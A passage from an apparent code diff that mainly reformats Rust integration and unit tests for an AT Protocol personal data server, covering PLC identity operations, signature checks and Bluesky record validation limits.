.bearer_auth(&token).json(&json!({ "token": "invalid-token-12345" })).send().await.unwrap(); 36 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 37 let body: serde_json::Value = res.json().await.unwrap(); 38 assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken"); ··· 42 async fn test_submit_plc_operation_validation() { 43 let client = client(); 44 let (token, did) = create_account_and_login(&client).await; 45 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 46 - let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 47 - .bearer_auth(&token).json(&json!({ "operation": { "type": "invalid_type" } })).send().await.unwrap(); 48 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 49 let body: serde_json::Value = res.json().await.unwrap(); 50 assert_eq!(body["error"], "InvalidRequest"); 51 - let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 52 - .bearer_auth(&token).json(&json!({ 53 "operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, 54 "alsoKnownAs": [], "services": {}, "prev": null } 55 - })).send().await.unwrap(); 56 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 57 let handle = did.split(':').last().unwrap_or("user"); 58 let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) ··· 75 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 76 let body: serde_json::Value = res.json().await.unwrap(); 77 assert_eq!(body["error"], "InvalidRequest"); 78 - assert!(body["message"].as_str().unwrap_or("").contains("signing key") || body["message"].as_str().unwrap_or("").contains("rotation")); 79 let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 80 .bearer_auth(&token).json(&json!({ 81 "operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"], ··· 100 async fn test_plc_token_lifecycle() { 101 let client = client(); 102 let (token, did) = create_account_and_login(&client).await; 103 - let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 104 - .bearer_auth(&token).send().await.unwrap(); 105 assert_eq!(res.status(), StatusCode::OK); 106 let db_url = get_db_connection_string().await; 107 let pool = PgPool::connect(&db_url).await.unwrap(); ··· 113 let row = row.unwrap(); 114 assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx"); 115 assert!(row.token.contains('-'), "Token should contain hyphen"); 116 - assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired"); 117 let diff = row.expires_at - chrono::Utc::now(); 118 - assert!(diff.num_minutes() >= 9 && diff.num_minutes() <= 11, "Token should expire in ~10 minutes"); 119 let token1 = row.token.clone(); 120 - let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 121 - .bearer_auth(&token).send().await.unwrap(); 122 assert_eq!(res.status(), StatusCode::OK); 123 let token2 = sqlx::query_scalar!( 124 "SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
··· 7 #[tokio::test] 8 async fn test_plc_operation_auth() { 9 let client = client(); 10 + let res = client 11 + .post(format!( 12 + "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 13 + base_url().await 14 + )) 15 + .send() 16 + .await 17 + .unwrap(); 18 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 19 + let res = client 20 + .post(format!( 21 + "{}/xrpc/com.atproto.identity.signPlcOperation", 22 + base_url().await 23 + )) 24 + .json(&json!({})) 25 + .send() 26 + .await 27 + .unwrap(); 28 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 29 + let res = client 30 + .post(format!( 31 + "{}/xrpc/com.atproto.identity.submitPlcOperation", 32 + base_url().await 33 + )) 34 + .json(&json!({ "operation": {} })) 35 + .send() 36 + .await 37 + .unwrap(); 38 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 39 let (token, _) = create_account_and_login(&client).await; 40 + let res = client 41 + .post(format!( 42 + "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 43 + base_url().await 44 + )) 45 + .bearer_auth(&token) 46 + .send() 47 + .await 48 + .unwrap(); 49 assert_eq!(res.status(), StatusCode::OK); 50 } 51 ··· 53 async fn test_sign_plc_operation_validation() { 54 let client = client(); 55 let (token, _) = create_account_and_login(&client).await; 56 + let res = client 57 + .post(format!( 58 + "{}/xrpc/com.atproto.identity.signPlcOperation", 59 + base_url().await 60 + )) 61 + .bearer_auth(&token) 62 + .json(&json!({})) 63 + .send() 64 + .await 65 + .unwrap(); 66 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 67 let body: serde_json::Value = res.json().await.unwrap(); 68 assert_eq!(body["error"], "InvalidRequest"); 69 + let res = client 70 + .post(format!( 71 + "{}/xrpc/com.atproto.identity.signPlcOperation", 72 + base_url().await 73 + )) 74 + .bearer_auth(&token) 75 + .json(&json!({ "token": "invalid-token-12345" })) 76 + .send() 77 + .await 78 + .unwrap(); 79 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 80 let body: serde_json::Value = res.json().await.unwrap(); 81 assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken"); ··· 85 async fn test_submit_plc_operation_validation() { 86 let client = client(); 87 let (token, did) = create_account_and_login(&client).await; 88 + let hostname = 89 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 90 + let res = client 91 + .post(format!( 92 + "{}/xrpc/com.atproto.identity.submitPlcOperation", 93 + base_url().await 94 + )) 95 + .bearer_auth(&token) 96 + .json(&json!({ "operation": { "type": "invalid_type" } })) 97 + .send() 98 + .await 99 + .unwrap(); 100 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 101 let body: serde_json::Value = res.json().await.unwrap(); 102 assert_eq!(body["error"], "InvalidRequest"); 103 + let res = client 104 + .post(format!( 105 + "{}/xrpc/com.atproto.identity.submitPlcOperation", 106 + base_url().await 107 + )) 108 + .bearer_auth(&token) 109 + .json(&json!({ 110 "operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, 111 "alsoKnownAs": [], "services": {}, "prev": null } 112 + })) 113 + .send() 114 + .await 115 + .unwrap(); 116 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 117 let handle = did.split(':').last().unwrap_or("user"); 118 let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) ··· 135 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 136 let body: serde_json::Value = res.json().await.unwrap(); 137 assert_eq!(body["error"], "InvalidRequest"); 138 + assert!( 139 + body["message"] 140 + .as_str() 141 + .unwrap_or("") 142 + .contains("signing key") 143 + || body["message"].as_str().unwrap_or("").contains("rotation") 144 + ); 145 let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 146 .bearer_auth(&token).json(&json!({ 147 "operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"], ··· 166 async fn test_plc_token_lifecycle() { 167 let client = client(); 168 let (token, did) = create_account_and_login(&client).await; 169 + let res = client 170 + .post(format!( 171 + "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 172 + base_url().await 173 + )) 174 + .bearer_auth(&token) 175 + .send() 176 + .await 177 + .unwrap(); 178 assert_eq!(res.status(), StatusCode::OK); 179 let db_url = get_db_connection_string().await; 180 let pool = PgPool::connect(&db_url).await.unwrap(); ··· 186 let row = row.unwrap(); 187 assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx"); 188 assert!(row.token.contains('-'), "Token should contain hyphen"); 189 + assert!( 190 + row.expires_at > chrono::Utc::now(), 191 + "Token should not be expired" 192 + ); 193 let diff = row.expires_at - chrono::Utc::now(); 194 + assert!( 195 + diff.num_minutes() >= 9 && diff.num_minutes() <= 11, 196 + "Token should expire in ~10 minutes" 197 + ); 198 let token1 = row.token.clone(); 199 + let res = client 200 + .post(format!( 201 + "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 202 + base_url().await 203 + )) 204 + .bearer_auth(&token) 205 + .send() 206 + .await 207 + .unwrap(); 208 assert_eq!(res.status(), StatusCode::OK); 209 let token2 = sqlx::query_scalar!( 210 "SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
+126 -40
tests/plc_validation.rs
··· 1 use tranquil_pds::plc::{ 2 PlcError, PlcOperation, PlcService, PlcValidationContext, cid_for_cbor, sign_operation, 3 signing_key_to_did_key, validate_plc_operation, validate_plc_operation_for_submission, 4 verify_operation_signature, 5 }; 6 - use k256::ecdsa::SigningKey; 7 - use serde_json::json; 8 - use std::collections::HashMap; 9 10 fn create_valid_operation() -> serde_json::Value { 11 let key = SigningKey::random(&mut rand::thread_rng()); ··· 32 assert!(validate_plc_operation(&op).is_ok()); 33 34 let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" }); 35 - assert!(matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type"))); 36 37 let invalid_type = json!({ "type": "invalid_type", "sig": "test" }); 38 - assert!(matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type"))); 39 40 let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} }); 41 - assert!(matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig"))); 42 43 let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" }); 44 - assert!(matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys"))); 45 46 let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" }); 47 - assert!(matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))); 48 49 let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" }); 50 - assert!(matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs"))); 51 52 let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" }); 53 - assert!(matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services"))); 54 55 - assert!(matches!(validate_plc_operation(&json!("not an object")), Err(PlcError::InvalidResponse(_)))); 56 } 57 58 #[test] ··· 61 let did_key = signing_key_to_did_key(&key); 62 let server_key = "did:key:zServer123"; 63 64 - let base_op = |rotation_key: &str, signing_key: &str, handle: &str, service_type: &str, endpoint: &str| json!({ 65 - "type": "plc_operation", 66 - "rotationKeys": [rotation_key], 67 - "verificationMethods": {"atproto": signing_key}, 68 - "alsoKnownAs": [format!("at://{}", handle)], 69 - "services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } }, 70 - "sig": "test" 71 - }); 72 73 let ctx = PlcValidationContext { 74 server_rotation_key: server_key.to_string(), ··· 77 expected_pds_endpoint: "https://pds.example.com".to_string(), 78 }; 79 80 - let op = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com"); 81 - assert!(matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key"))); 82 83 let ctx_with_user_key = PlcValidationContext { 84 server_rotation_key: did_key.clone(), ··· 87 expected_pds_endpoint: "https://pds.example.com".to_string(), 88 }; 89 90 - let wrong_signing = base_op(&did_key, "did:key:zWrongKey", "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com"); 91 - assert!(matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key"))); 92 93 - let wrong_handle = base_op(&did_key, &did_key, "wrong.handle", "AtprotoPersonalDataServer", "https://pds.example.com"); 94 - assert!(matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle"))); 95 96 - let wrong_service_type = base_op(&did_key, &did_key, "test.handle", "WrongServiceType", "https://pds.example.com"); 97 - assert!(matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type"))); 98 99 - let wrong_endpoint = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://wrong.endpoint.com"); 100 - assert!(matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint"))); 101 } 102 103 #[test] ··· 121 assert!(result.is_ok() && !result.unwrap()); 122 123 let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} }); 124 - assert!(matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig"))); 125 126 let invalid_base64 = json!({ 127 "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, 128 "alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!" 129 }); 130 - assert!(matches!(verify_operation_signature(&invalid_base64, &[]), Err(PlcError::InvalidResponse(_)))); 131 } 132 133 #[test] ··· 136 let cid1 = cid_for_cbor(&value).unwrap(); 137 let cid2 = cid_for_cbor(&value).unwrap(); 138 assert_eq!(cid1, cid2, "CID should be deterministic"); 139 - assert!(cid1.starts_with("bafyrei"), "CID should be dag-cbor + sha256"); 140 141 let value2 = json!({ "alpha": 999 }); 142 let cid3 = cid_for_cbor(&value2).unwrap(); ··· 145 let key = SigningKey::random(&mut rand::thread_rng()); 146 let did = signing_key_to_did_key(&key); 147 assert!(did.starts_with("did:key:z") && did.len() > 50); 148 - assert_eq!(did, signing_key_to_did_key(&key), "Same key should produce same did"); 149 150 let key2 = SigningKey::random(&mut rand::thread_rng()); 151 - assert_ne!(did, signing_key_to_did_key(&key2), "Different keys should produce different dids"); 152 } 153 154 #[test] 155 fn test_tombstone_operations() { 156 - let tombstone = json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" }); 157 assert!(validate_plc_operation(&tombstone).is_ok()); 158 159 let key = SigningKey::random(&mut rand::thread_rng()); ··· 175 "alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature" 176 }); 177 let signed = sign_operation(&op, &key).unwrap(); 178 - assert_ne!(signed.get("sig").and_then(|v| v.as_str()).unwrap(), "old_signature"); 179 180 let mut services = HashMap::new(); 181 - services.insert("atproto_pds".to_string(), PlcService { 182 - service_type: "AtprotoPersonalDataServer".to_string(), 183 - endpoint: "https://pds.example.com".to_string(), 184 - }); 185 let mut verification_methods = HashMap::new(); 186 verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string()); 187 let op = PlcOperation {
··· 1 + use k256::ecdsa::SigningKey; 2 + use serde_json::json; 3 + use std::collections::HashMap; 4 use tranquil_pds::plc::{ 5 PlcError, PlcOperation, PlcService, PlcValidationContext, cid_for_cbor, sign_operation, 6 signing_key_to_did_key, validate_plc_operation, validate_plc_operation_for_submission, 7 verify_operation_signature, 8 }; 9 10 fn create_valid_operation() -> serde_json::Value { 11 let key = SigningKey::random(&mut rand::thread_rng()); ··· 32 assert!(validate_plc_operation(&op).is_ok()); 33 34 let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" }); 35 + assert!( 36 + matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")) 37 + ); 38 39 let invalid_type = json!({ "type": "invalid_type", "sig": "test" }); 40 + assert!( 41 + matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")) 42 + ); 43 44 let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} }); 45 + assert!( 46 + matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")) 47 + ); 48 49 let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" }); 50 + assert!( 51 + matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")) 52 + ); 53 54 let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" }); 55 + assert!( 56 + matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")) 57 + ); 58 59 let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" }); 60 + assert!( 61 + matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")) 62 + ); 63 64 let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" }); 65 + assert!( 66 + matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services")) 67 + ); 68 69 + assert!(matches!( 70 + validate_plc_operation(&json!("not an object")), 71 + Err(PlcError::InvalidResponse(_)) 72 + )); 73 } 74 75 #[test] ··· 78 let did_key = signing_key_to_did_key(&key); 79 let server_key = "did:key:zServer123"; 80 81 + let base_op = |rotation_key: &str, 82 + signing_key: &str, 83 + handle: &str, 84 + service_type: &str, 85 + endpoint: &str| { 86 + json!({ 87 + "type": "plc_operation", 88 + "rotationKeys": [rotation_key], 89 + "verificationMethods": {"atproto": signing_key}, 90 + "alsoKnownAs": [format!("at://{}", handle)], 91 + "services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } }, 92 + "sig": "test" 93 + }) 94 + }; 95 96 let ctx = PlcValidationContext { 97 server_rotation_key: server_key.to_string(), ··· 100 expected_pds_endpoint: "https://pds.example.com".to_string(), 101 }; 102 103 + let op = base_op( 104 + &did_key, 105 + &did_key, 106 + "test.handle", 107 + "AtprotoPersonalDataServer", 108 + "https://pds.example.com", 109 + ); 110 + assert!( 111 + matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")) 112 + ); 113 114 let ctx_with_user_key = PlcValidationContext { 115 server_rotation_key: did_key.clone(), ··· 118 expected_pds_endpoint: "https://pds.example.com".to_string(), 119 }; 120 121 + let wrong_signing = base_op( 122 + &did_key, 123 + "did:key:zWrongKey", 124 + "test.handle", 125 + "AtprotoPersonalDataServer", 126 + "https://pds.example.com", 127 + ); 128 + assert!( 129 + matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")) 130 + ); 131 132 + let wrong_handle = base_op( 133 + &did_key, 134 + &did_key, 135 + "wrong.handle", 136 + "AtprotoPersonalDataServer", 137 + "https://pds.example.com", 138 + ); 139 + assert!( 140 + matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")) 141 + ); 142 143 + let wrong_service_type = base_op( 144 + &did_key, 145 + &did_key, 146 + "test.handle", 147 + "WrongServiceType", 148 + "https://pds.example.com", 149 + ); 150 + assert!( 151 + matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type")) 152 + ); 153 154 + let wrong_endpoint = base_op( 155 + &did_key, 156 + &did_key, 157 + "test.handle", 158 + "AtprotoPersonalDataServer", 159 + "https://wrong.endpoint.com", 160 + ); 161 + assert!( 162 + matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")) 163 + ); 164 } 165 166 #[test] ··· 184 assert!(result.is_ok() && !result.unwrap()); 185 186 let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} }); 187 + assert!( 188 + matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")) 189 + ); 190 191 let invalid_base64 = json!({ 192 "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, 193 "alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!" 194 }); 195 + assert!(matches!( 196 + verify_operation_signature(&invalid_base64, &[]), 197 + Err(PlcError::InvalidResponse(_)) 198 + )); 199 } 200 201 #[test] ··· 204 let cid1 = cid_for_cbor(&value).unwrap(); 205 let cid2 = cid_for_cbor(&value).unwrap(); 206 assert_eq!(cid1, cid2, "CID should be deterministic"); 207 + assert!( 208 + cid1.starts_with("bafyrei"), 209 + "CID should be dag-cbor + sha256" 210 + ); 211 212 let value2 = json!({ "alpha": 999 }); 213 let cid3 = cid_for_cbor(&value2).unwrap(); ··· 216 let key = SigningKey::random(&mut rand::thread_rng()); 217 let did = signing_key_to_did_key(&key); 218 assert!(did.starts_with("did:key:z") && did.len() > 50); 219 + assert_eq!( 220 + did, 221 + signing_key_to_did_key(&key), 222 + "Same key should produce same did" 223 + ); 224 225 let key2 = SigningKey::random(&mut rand::thread_rng()); 226 + assert_ne!( 227 + did, 228 + signing_key_to_did_key(&key2), 229 + "Different keys should produce different dids" 230 + ); 231 } 232 233 #[test] 234 fn test_tombstone_operations() { 235 + let tombstone = 236 + json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" }); 237 assert!(validate_plc_operation(&tombstone).is_ok()); 238 239 let key = SigningKey::random(&mut rand::thread_rng()); ··· 255 "alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature" 256 }); 257 let signed = sign_operation(&op, &key).unwrap(); 258 + assert_ne!( 259 + signed.get("sig").and_then(|v| v.as_str()).unwrap(), 260 + "old_signature" 261 + ); 262 263 let mut services = HashMap::new(); 264 + services.insert( 265 + "atproto_pds".to_string(), 266 + PlcService { 267 + service_type: "AtprotoPersonalDataServer".to_string(), 268 + endpoint: "https://pds.example.com".to_string(), 269 + }, 270 + ); 271 let mut verification_methods = HashMap::new(); 272 verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string()); 273 let op = PlcOperation {
+191 -44
tests/record_validation.rs
··· 1 use tranquil_pds::validation::{ 2 RecordValidator, ValidationError, ValidationStatus, validate_collection_nsid, 3 validate_record_key, 4 }; 5 - use serde_json::json; 6 7 fn now() -> String { 8 chrono::Utc::now().to_rfc3339() ··· 17 "text": "Hello world!", 18 "createdAt": now() 19 }); 20 - assert_eq!(validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 21 22 let missing_text = json!({ 23 "$type": "app.bsky.feed.post", 24 "createdAt": now() 25 }); 26 - assert!(matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text")); 27 28 let missing_created_at = json!({ 29 "$type": "app.bsky.feed.post", 30 "text": "Hello" 31 }); 32 - assert!(matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt")); 33 34 let text_too_long = json!({ 35 "$type": "app.bsky.feed.post", 36 "text": "a".repeat(3001), 37 "createdAt": now() 38 }); 39 - assert!(matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text")); 40 41 let text_at_limit = json!({ 42 "$type": "app.bsky.feed.post", 43 "text": "a".repeat(3000), 44 "createdAt": now() 45 }); 46 - assert_eq!(validator.validate(&text_at_limit, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 47 48 let too_many_langs = json!({ 49 "$type": "app.bsky.feed.post", ··· 51 "createdAt": now(), 52 "langs": ["en", "fr", "de", "es"] 53 }); 54 - assert!(matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs")); 55 56 let three_langs_ok = json!({ 57 "$type": "app.bsky.feed.post", ··· 59 "createdAt": now(), 60 "langs": ["en", "fr", "de"] 61 }); 62 - assert_eq!(validator.validate(&three_langs_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 63 64 let too_many_tags = json!({ 65 "$type": "app.bsky.feed.post", ··· 67 "createdAt": now(), 68 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"] 69 }); 70 - assert!(matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags")); 71 72 let eight_tags_ok = json!({ 73 "$type": "app.bsky.feed.post", ··· 75 "createdAt": now(), 76 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"] 77 }); 78 - assert_eq!(validator.validate(&eight_tags_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 79 80 let tag_too_long = json!({ 81 "$type": "app.bsky.feed.post", ··· 83 "createdAt": now(), 84 "tags": ["t".repeat(641)] 85 }); 86 - assert!(matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))); 87 } 88 89 #[test] ··· 95 "displayName": "Test User", 96 "description": "A test user profile" 97 }); 98 - assert_eq!(validator.validate(&valid, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid); 99 100 let empty_ok = json!({ 101 "$type": "app.bsky.actor.profile" 102 }); 103 - assert_eq!(validator.validate(&empty_ok, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid); 104 105 let displayname_too_long = json!({ 106 "$type": "app.bsky.actor.profile", 107 "displayName": "n".repeat(641) 108 }); 109 - assert!(matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 110 111 let description_too_long = json!({ 112 "$type": "app.bsky.actor.profile", 113 "description": "d".repeat(2561) 114 }); 115 - assert!(matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description")); 116 } 117 118 #[test] ··· 127 }, 128 "createdAt": now() 129 }); 130 - assert_eq!(validator.validate(&valid_like, "app.bsky.feed.like").unwrap(), ValidationStatus::Valid); 131 132 let missing_subject = json!({ 133 "$type": "app.bsky.feed.like", 134 "createdAt": now() 135 }); 136 - assert!(matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject")); 137 138 let missing_subject_uri = json!({ 139 "$type": "app.bsky.feed.like", ··· 142 }, 143 "createdAt": now() 144 }); 145 - assert!(matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri"))); 146 147 let invalid_subject_uri = json!({ 148 "$type": "app.bsky.feed.like", ··· 152 }, 153 "createdAt": now() 154 }); 155 - assert!(matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))); 156 157 let valid_repost = json!({ 158 "$type": "app.bsky.feed.repost", ··· 162 }, 163 "createdAt": now() 164 }); 165 - assert_eq!(validator.validate(&valid_repost, "app.bsky.feed.repost").unwrap(), ValidationStatus::Valid); 166 167 let repost_missing_subject = json!({ 168 "$type": "app.bsky.feed.repost", 169 "createdAt": now() 170 }); 171 - assert!(matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject")); 172 } 173 174 #[test] ··· 180 "subject": "did:plc:test12345", 181 "createdAt": now() 182 }); 183 - assert_eq!(validator.validate(&valid_follow, "app.bsky.graph.follow").unwrap(), ValidationStatus::Valid); 184 185 let missing_follow_subject = json!({ 186 "$type": "app.bsky.graph.follow", 187 "createdAt": now() 188 }); 189 - assert!(matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject")); 190 191 let invalid_follow_subject = json!({ 192 "$type": "app.bsky.graph.follow", 193 "subject": "not-a-did", 194 "createdAt": now() 195 }); 196 - assert!(matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 197 198 let valid_block = json!({ 199 "$type": "app.bsky.graph.block", 200 "subject": "did:plc:blocked123", 201 "createdAt": now() 202 }); 203 - assert_eq!(validator.validate(&valid_block, "app.bsky.graph.block").unwrap(), ValidationStatus::Valid); 204 205 let invalid_block_subject = json!({ 206 "$type": "app.bsky.graph.block", 207 "subject": "not-a-did", 208 "createdAt": now() 209 }); 210 - assert!(matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 211 } 212 213 #[test] ··· 220 "purpose": "app.bsky.graph.defs#modlist", 221 "createdAt": now() 222 }); 223 - assert_eq!(validator.validate(&valid_list, "app.bsky.graph.list").unwrap(), ValidationStatus::Valid); 224 225 let list_name_too_long = json!({ 226 "$type": "app.bsky.graph.list", ··· 228 "purpose": "app.bsky.graph.defs#modlist", 229 "createdAt": now() 230 }); 231 - assert!(matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name")); 232 233 let list_empty_name = json!({ 234 "$type": "app.bsky.graph.list", ··· 236 "purpose": "app.bsky.graph.defs#modlist", 237 "createdAt": now() 238 }); 239 - assert!(matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name")); 240 241 let valid_list_item 